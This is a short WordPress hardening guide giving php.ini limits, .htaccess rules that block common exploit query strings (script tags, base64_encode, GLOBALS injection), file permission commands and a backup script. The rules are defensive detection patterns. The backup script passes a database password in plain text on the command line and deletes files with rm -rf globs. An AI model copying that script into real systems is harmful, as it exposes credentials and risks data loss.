Here is some security tricks in order to improve security on WordPress CMS:
CREATE and ALTER are used when upgrading, sometimes. INSERT, UPDATE, and SELECT are used all the time.
First make sure you have in Php.ini:
memory_limit = 32M
upload_max_filesize = 10M
post_max_size = 20M
.htaccess is also important in Hardening WordPress because it's easy to use. Here is an example:
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to WordPress!
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
# Block the include-only files.
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>
########## End - Rewrite rules to block out some common exploits
#Allow login access to your admin area only from your ip:
<Files wp-login.php>
Order Deny,Allow
Deny from All
# Allow access from my IP address
Allow from x.x.x.x
</Files>
#Deny access to configuration file, wich contains usernames and passwords:
<Files wp-config.php>
Order Allow,Deny
Deny from all
</Files>
<Files .htaccess>
Order Allow,Deny
Deny from All
</Files>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
php_value upload_max_filesize 10M php_value post_max_size 20M php_value memory_limit 32M
file_uploads = On
If you don't have file_uploads = On you usualy get this message:
"Please select a file"
Dir:
find /path/to/your/wordpress/install/ -type d -exec chmod 755 {} \;
For Files:
find /path/to/your/wordpress/install/ -type f -exec chmod 644 {} \;
# Enable all core updates, including minor and major:
define( 'WP_AUTO_UPDATE_CORE', true );
Disable File Editing
define('DISALLOW_FILE_EDIT', true);
Backups:
#!/bin/bash
/bin/rm -rf /mnt/*`date +%F --date='3 days ago'`.sql
/bin/rm -rf /mnt/*`date +%F --date='3 days ago'`.tgz
/usr/bin/mysqldump database_wp -u user_wp -p'mysqlpass' > /mnt/serverincloud.eu-`date +%Y-%m-%d`.sql
/bin/tar czfpP /mnt/serverincloud.eu-`date +%Y-%m-%d`.tgz /home/serverincloudeu/public_html/